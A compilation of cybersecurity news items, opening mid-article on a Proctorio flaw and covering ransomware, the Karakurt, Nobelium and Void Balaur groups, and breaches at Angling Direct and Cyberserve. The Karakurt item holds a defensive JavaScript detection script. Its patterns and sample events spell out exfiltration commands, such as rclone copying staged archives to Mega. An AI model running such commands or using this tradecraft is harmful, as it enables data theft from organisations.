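The second half of the fix sits on the other side of the boundary: the background page must treat every message from a content script as attacker-influenced and validate message type and fields against an allow-list, because a page that has compromised the content script can send whatever it likes.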

Proctorio has since fixed the critical flaw. Because Chrome browser extensions update automatically, users do not need to do anything to be protected. 

Sector7 reported the problem to Proctorio in June and received confirmation a week later that it had been fixed. Sector7 verified the fix in August, well before publishing its technical findings last week. Sector7/Computest examined the Proctorio software at the request of Dutch media outlet RTL Nieuws, which subsequently reported on the findings.

US Cyber Command Together with NSA and FBI has Started Taking Direct Action Against International Ransomware Gangs

 

General Paul M. Nakasone, commander of US Cyber Command, said at a recent national security forum that the organization has begun taking direct action against multinational ransomware groups as part of a broader campaign to reduce attacks on American businesses and infrastructure. 

During his speech at the Reagan National Defense Forum, a gathering of national security experts conducted on Saturday, the General highlighted that the department is working in conjunction with the NSA, FBI, and other federal organizations. 

Following the event, he told The New York Times that Cyber Command's current aim is to "understand the adversary and their insights better than we've ever understood them before." 

The nation's cyber defense authorities began a campaign targeting ransomware threats from organized criminal rings around nine months ago, well before high-profile cases such as the Colonial Pipeline shutdown showed how badly ransomware attacks can disrupt national and international infrastructure. 

While the General was tight-lipped about the specifics of current and past counter-operations, earlier reports indicated that Cyber Command was involved both in punitive actions, including those against the Russian ransomware group REvil, and in recovery efforts such as those undertaken by federal agencies after the Colonial Pipeline attack. The latter resulted in the DOJ seizing and recovering the "majority" of the ransom paid to the DarkSide ransomware group. 

All of these efforts are part of a broader push called for by a presidential executive order signed in May of this year. The order mandated a government-wide shift to security measures such as mandatory multi-factor authentication, zero-trust principles, and the establishment of a new Cyber Safety Review Board. 

In a recent presentation, the head of Cyber Command emphasized the need for "speed, agility, and unity of effort", saying that all three are critical in confronting threats, whether they come from nation-states, their proxies, or independent criminal groups. Looking ahead, Nakasone hopes to see a federal push for a "whole-of-government effort." 

Diplomatic outreach activities, as well as an extended and globalized focus on defending critical infrastructure resources, are seen as critical steps towards saving the nation from ransomware cyberattacks as well as other cyber invasions, according to the General.

‘Karakurt’ Extortion Back with an Upswing

 

As of late, a new money-driven attack group has been on the upswing, and unlike previous groups, it does not appear to be interested in spreading ransomware or attacking high-profile targets. 

Accenture Security researchers have been investigating a group that calls itself "Karakurt," meaning "black wolf" in Turkish, and is also the name of a deadly spider prevalent in eastern Europe and Siberia. 

Karakurt specializes in data exfiltration followed by extortion, which lets it operate quickly. By September it had already claimed more than 40 victims, 95 percent of them in North America and the rest in Europe, according to a report released on Friday by the researchers. 

The researchers suggest Karakurt may be a trend-setter: before long, similar groups may move away from hitting large corporations or critical-infrastructure providers with ransomware and adopt the same exfiltration-and-extortion approach. 

“The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big-game hunting approach,” read the report.

According to Accenture CIFR researchers, Karakurt was first spotted by investigators outside Accenture Security in June, when it began building its network and data-leak infrastructure. In August the group registered the domains karakurt.group and karakurt.tech, as well as the Twitter handle @karakurtlair, and shortly afterwards carried out its first successful attack. 

Accenture Security's collection sources and intrusion research identified the group's first victim in September; two months later, the group named that victim on the karakurt.group website.

Karakurt's tactics, techniques, and procedures (TTPs) for breaking into victim infrastructure, establishing persistence, moving laterally, and stealing data resemble those of many other threat actors, and the group frequently takes a "living off the land" approach, i.e., using tools and features already present on the targeted systems. 

Once inside a network, Karakurt primarily maintains persistence through service installation, remote-management software, and Cobalt Strike command-and-control (C2) beacons distributed across the victim environment. 

However, the researchers noted that the group recently appears to have changed how it establishes backup persistence. Rather than deploying Cobalt Strike, Karakurt "persisted within the victim's network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices," they said. This lets the gang move laterally using previously obtained user, service, and administrator credentials. 

The researchers said the gang also uses other remote-management tools, such as Remote Desktop Protocol (RDP), Cobalt Strike, and PowerShell commands, to move laterally and locate data worth stealing for extortion. 

Still, the group's attack pattern so far shows that it is flexible enough to adapt its techniques to the victim's environment. Karakurt can also evade detection in many cases because it frequently uses legitimate credentials to access systems. 

For exfiltration, Karakurt compresses data with 7zip or WinZip and uses Rclone or FileZilla (SFTP) for staging and final transfer to Mega.io cloud storage. According to Accenture Security, the staging folders used in the attacks were C:\Perflogs and C:\Recovery. 
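Most of that tradecraft is legitimate tooling run in unusual places, which is why it is best caught from process-creation telemetry rather than file hashes. The following is an added example, not Accenture's code, of detection logic for the indicators described: archivers writing into C:\PerfLogs or C:\Recovery, Rclone pushing to a Mega remote, FileZilla launched with an SFTP URL, and AnyDesk executing. The event records are constructed for the example, and the rule names and the assumption that AnyDesk is not sanctioned in the environment are the example's own.

```javascript
// Added example: match parsed process-creation records (the fields an EDR or
// Sysmon Event ID 1 feed provides) against Karakurt exfiltration and
// persistence tradecraft. Records below are constructed, not real telemetry.
const STAGING_DIRS = ['c:\\perflogs', 'c:\\recovery'];
const ARCHIVERS = ['7z.exe', '7za.exe', '7zg.exe', 'winzip64.exe', 'wzzip.exe'];

function basename(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

function touchesStagingDir(commandLine) {
  const lower = commandLine.toLowerCase();
  return STAGING_DIRS.some((d) => lower.includes(d));
}

const RULES = [
  {
    name: 'archive_written_to_staging_dir',
    match: (e) => ARCHIVERS.includes(basename(e.image)) && touchesStagingDir(e.commandLine),
  },
  {
    name: 'rclone_to_mega',
    // rclone remote named "mega:" or a Mega hostname on the command line
    match: (e) => basename(e.image) === 'rclone.exe' && /\bmega:|mega\.(io|nz)\b/i.test(e.commandLine),
  },
  {
    name: 'filezilla_sftp',
    match: (e) => basename(e.image) === 'filezilla.exe' && /sftp:\/\//i.test(e.commandLine),
  },
  {
    name: 'anydesk_unsanctioned',
    // assumption: AnyDesk is not approved remote-management software here
    match: (e) => basename(e.image) === 'anydesk.exe',
  },
];

// Returns one alert per (event, rule) pair that matches.
function detectKarakurt(events) {
  const alerts = [];
  for (const e of events) {
    for (const r of RULES) {
      if (r.match(e)) {
        alerts.push({ rule: r.name, host: e.host, user: e.user, commandLine: e.commandLine });
      }
    }
  }
  return alerts;
}

// Constructed sample events (hosts, users and paths are invented).
const SAMPLE_EVENTS = [
  { host: 'FS01', user: 'CORP\\svc_backup', image: 'C:\\Program Files\\7-Zip\\7z.exe',
    commandLine: '7z.exe a -mx1 C:\\PerfLogs\\fin.7z \\\\FS01\\Finance\\*' },
  { host: 'FS01', user: 'CORP\\svc_backup', image: 'C:\\Users\\Public\\rclone.exe',
    commandLine: 'rclone.exe copy C:\\PerfLogs mega:loot --transfers 10' },
  { host: 'WS22', user: 'CORP\\jdoe', image: 'C:\\Users\\jdoe\\Downloads\\AnyDesk.exe',
    commandLine: 'AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent' },
  { host: 'WS22', user: 'CORP\\jdoe', image: 'C:\\Windows\\System32\\notepad.exe',
    commandLine: 'notepad.exe C:\\Users\\jdoe\\notes.txt' },
  { host: 'DC01', user: 'CORP\\admin', image: 'C:\\Program Files\\FileZilla FTP Client\\filezilla.exe',
    commandLine: 'filezilla.exe sftp://198.51.100.7' },
];

for (const a of detectKarakurt(SAMPLE_EVENTS)) {
  console.log(`[${a.rule}] ${a.host} ${a.user}: ${a.commandLine}`);
}
```

Each rule on its own is noisy in some environments (admins do use 7-Zip and FileZilla); the value is in correlating an archive write to a staging directory with an outbound transfer tool on the same host within a short window, which is the pattern the report describes.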

The researchers offered standard mitigation recommendations to help enterprises avoid being compromised and extorted by Karakurt, which, once it has stolen data, calls victims repeatedly to pressure them into paying.

Nobelium Hacking Group Targets French Organisations

 

According to the French national cybersecurity agency ANSSI, the Russian-backed Nobelium hacking group responsible for last year's SolarWinds compromise has been targeting French organizations since February 2021. 

While ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information) has not determined how Nobelium gained access to email accounts belonging to French organizations, it says the hackers used them to send malicious emails to foreign entities.

French government organizations were in turn targeted by fraudulent emails sent from servers belonging to foreign companies, which are believed to have been compromised by the same threat actor. Nobelium's attack infrastructure against French entities was built mainly on virtual private servers (VPS) from several hosting providers (favoring OVH servers located close to the targeted countries). 

"Overlaps have been identified in the tactics, techniques, and procedures (TTP) between the phishing campaigns monitored by ANSSI and the SOLARWINDS supply chain attack in 2020," ANSSI explained in a report. 

To defend against this group's attacks, ANSSI advises restricting the processing of email attachments so that malicious files delivered in phishing campaigns are blocked. 

The French agency also urges at-risk organizations to apply its Active Directory hardening guidance to improve AD security (and the security of AD servers in particular). 

Nobelium, the group behind last year's SolarWinds supply-chain attack, which led to the compromise of several US federal agencies, is the hacking division of Russia's Foreign Intelligence Service (SVR), also tracked as APT29, The Dukes, or Cozy Bear. 

In April, the US government formally accused the SVR of orchestrating the "broad-scope cyber-espionage campaign" that hit SolarWinds. 

Based on tactics seen in incidents going back to 2018, cybersecurity firm Volexity also attributed the attacks to the same threat actor. 

In May, the Microsoft Threat Intelligence Center (MSTIC) published details of a Nobelium phishing campaign that targeted government agencies in 24 countries. 

Nobelium is still targeting the global IT supply chain, according to Microsoft, having targeted 140 managed service providers (MSPs) and cloud service providers and compromised at least 14 of them since May 2021. 

Nobelium has also attacked Active Directory Federation Services (AD FS) servers, seeking to infiltrate governments, think tanks, and private companies in the United States and Europe using FoggyWeb, a new passive and highly targeted backdoor. 

In October, Microsoft disclosed that Nobelium was by far the most active Russian hacking group between July 2020 and June 2021, responsible for 92% of the notifications Microsoft sent to customers about Russia-based threat activity. 

Mandiant has also linked the group to attempts to compromise government and enterprise networks worldwide by targeting their MSPs, using a new backdoor codenamed Ceeloader that is designed to deliver additional malware and capture information of political interest to Russia.

Norton Research Shows That Almost 42% of UK Gamers Have Encountered Cyber-Attack

 

Whether casual or diehard, gamers polled in the UK said they would rather spend their time playing video games than attend a sporting event or concert (72%), go on a date (72%), or read a book (68%). 

The 2021 Norton Cyber Safety Insights Report: Special Release – Gaming & Cybercrime, conducted by The Harris Poll among more than 700 UK adults who currently play online games, found that more than two in five UK gamers (42 percent) have experienced a cyberattack on their gaming account or device. Nearly four in five of those (78 percent) say they suffered a financial loss as a direct result, losing an average of £145. 

The study also produced striking findings about gamer-to-gamer cyber risks and the lengths gamers will go to in order to win. More than a quarter of British gamers polled (28%) are at least somewhat likely to hack into a friend's, family member's, or romantic partner's gaming account if they knew it would give them a competitive advantage in an online game. This is far more pronounced among hardcore gamers, with roughly half of those polled (48 percent) saying they are at least somewhat likely to do so, underlining how determined serious gamers are to win. 

“These findings are jarring, but there are some gamers out there that will do whatever it takes to win,” said BigCheeseKIT, gamer, and Twitch streamer. “I’ve learned that when you’re gaming online, it’s so important to be mindful of who you are friends with online and what information you share when gaming online. While this is especially true for professional gamers who have that public profile, it’s clear this goes for any online gamer.” 

The competitive spirit runs through all kinds of gamers, from casual to diehard. If they knew it would give them a competitive advantage, more than two in five UK gamers polled (43 percent) said they would be at least somewhat likely to exploit loopholes or bugs in a game, and around a third would download cheats to their gaming account or device (34 percent), pay to take over another user's gaming account (30 percent), or hack into a random player's gaming account (29 percent). 

“Scammers know that – for both experienced and casual gamers – cheats, skins, and limited edition items are highly sought after,” said Armin Buescher, Technical Director at NortonLifeLock. “Offering these competitive boosts is a perfect opportunity to share malicious links or trick gamers into downloading malware that, if successful, can rob players of their gaming profile, personal information, or more. Having security that specifically helps protect against these threats can give players peace of mind so they can focus on the enjoyment of the game itself.”

"Void Balaur" Cyber Mercenary Group Unveiled by Trend Micro

 

In a prolific campaign of financially motivated attacks running since 2015, a hacker-for-hire operation run by cyber mercenaries has targeted thousands of individuals and organizations around the world. 

Human rights activists, journalists, politicians, telecommunications engineers, and medical professionals are among those targeted by the group, according to Trend Micro researchers. It has been named Void Balaur, after a multi-headed dragon from Eastern European folklore. 

Since 2018, the cyber-mercenary group has advertised its services on Russian-language forums. Its main offerings are hacking into email and social media accounts and obtaining and selling sensitive personal and financial information. Occasionally these attacks also plant information-stealing malware on victims' devices. 

Who the targets are seems to matter little, as long as whoever commissions the attacks pays. Only a handful of jobs are active at any one time, but those that are get Void Balaur's undivided attention. 

"There will just be a dozen targets a day, usually less. But those targets are high-profile targets -- we found government ministers, members of parliaments, a lot of people from the media, and a lot of medical doctors," Feike Hacquebord, senior threat researcher at Trend Micro, said. 

Targets include a former intelligence chief and five serving members of the government in an undisclosed European country. Targeted people and institutions are spread across the world, including North America, Europe, Russia, and India. 

Several of the attacks appear to be politically motivated, aimed at people in countries where governments may violate their human rights if their activities are exposed. Like many malicious hacking operations, a number of Void Balaur attacks begin with phishing emails tailored to the chosen victim. The group also claims it can gain access to certain email accounts with no user interaction at all, and sells that service at a premium compared with its other offerings. 

Many campaigns run for a long time. One targeting a large, unnamed Russian conglomerate, for example, was active from at least September 2020 to August 2021 and targeted not only the owners of the businesses but also their family members and senior executives of every company in the group. 

"There's a set of companies owned by one person and his family members were targeted, the CEOs of the companies were being targeted, and that all happens over more than one year," said Hacquebord.

Angling Direct Hacked: Website Visitors Directed to Pornhub

 

Attackers have taken over Angling Direct's systems, redirecting visitors from its websites to Pornhub and threatening to delete its internal data. Besides the website redirect, the company's Twitter account was hijacked to post a reference to a porn site and contact details for the attacker. 

The London Stock Exchange-listed supplier of fishing gear and equipment said it is dealing with a cybersecurity incident after discovering suspicious activity on its network late on Friday, November 5.

It further told the City: "This unauthorized activity shut down the Company's websites and these remain inactive. Some of the Company's social media accounts have also been compromised. The Board has appointed external cyber security specialists whose investigations are underway to establish what happened. Work continues round the clock to bring the websites back online while our 39 retail stores across the UK have remained open and continue to trade." 

However, Angling Direct said it is not yet clear whether any personal information has been accessed, and that no payment data has been exposed. The attacker also posted an email address and a promise to return "information and access" to the website. There were no public ransom demands. 

Embarrassment aside, this incident will send chills down the spines of company executives. The attack has all the hallmarks of an immature hacker having fun, but it is undoubtedly causing serious problems for the victim. 

The company has further indicated that the evidence points to staff login credentials being stolen, allowing the hackers to take over its website and, at the same time, its Twitter account. The motive is clear: the criminals want to be paid before handing control back to the company. 

In the meantime, the firm is losing a great deal in prospective sales, not to mention the damage to trust and brand, as customers feel embarrassed or worse when they are unexpectedly sent to an explicit site.

In a statement, the company said: "We are mindful of our obligations regarding data; it is too soon yet to make any determination around the impact this incident has had on personal data. Importantly, the company does not hold any customer financial data, as our website transactions are handled by third parties."

BlackShadow Hacker Organization Hijacked Cyberserve Firm

 

The Israeli hosting provider Cyberserve has been hacked by BlackShadow, an Iranian state-sponsored hacking group, which stole client records and disrupted the company's services. 

Cyberserve is a web development and hosting company headquartered in Israel that is employed by a variety of organizations, including local radio stations, museums, and educational establishments. 

Beginning on Friday, October 29, users trying to reach websites hosted by Cyberserve encountered errors and notices saying the site was unavailable because of a cybersecurity incident. 

A hacker group calling itself BlackShadow claimed responsibility for the Cyberserve attack and is extorting the hosting firm and its customers for $1 million in bitcoin in exchange for not leaking the stolen data. 

The extortion demand carried a 48-hour deadline starting on Saturday, October 30, but the hackers almost immediately leaked a sample of 1,000 records to prove their point. 

A database holding the personally identifiable information of users of a large LGBT site called 'Atraf' was stolen in the breach, making the incident especially serious: exposing LGBT individuals in conservative communities puts them at physical and psychological risk. 

"Atraf's team did not contact us for any deals yet so we collected 50 famous Israelis that were surfing and we leak their videos," the group threatened on Telegram. A number of websites hosted by Cyberserve, including Atraf, remain offline, suggesting that the firm is still dealing with the attack. 

This assault has also impacted the following websites: 

  • The Kavim (Dan Bus) public transportation firm. 
  • The Kan public broadcaster. 
  • The Pegasus travel agency. 
  • The Holon Children's Museum. 

BlackShadow is an Iranian state-sponsored hacking group with confirmed ties to the Pay2Key ransomware strain, which has been used against Israeli targets on several occasions. Unlike traditional ransomware operators, the actors behind BlackShadow are not thought to be financially motivated. 

According to Omri Segev Moyal, co-founder and CEO of Israeli cybersecurity firm Profero, these hacker organizations' activities are retaliatory and intended to undermine Israeli interests. 

"The recent attacks from the so-called 'BlackShadow' are just another cycle of the clandestine Iran-Israeli war. It’s a well-constructed InfoOp combined with very weak hacking skills to hurt Israel. We assume the current cycle is also in retaliation for the attack against the gas pumps in Iran last week." - Omri Segev Moyal.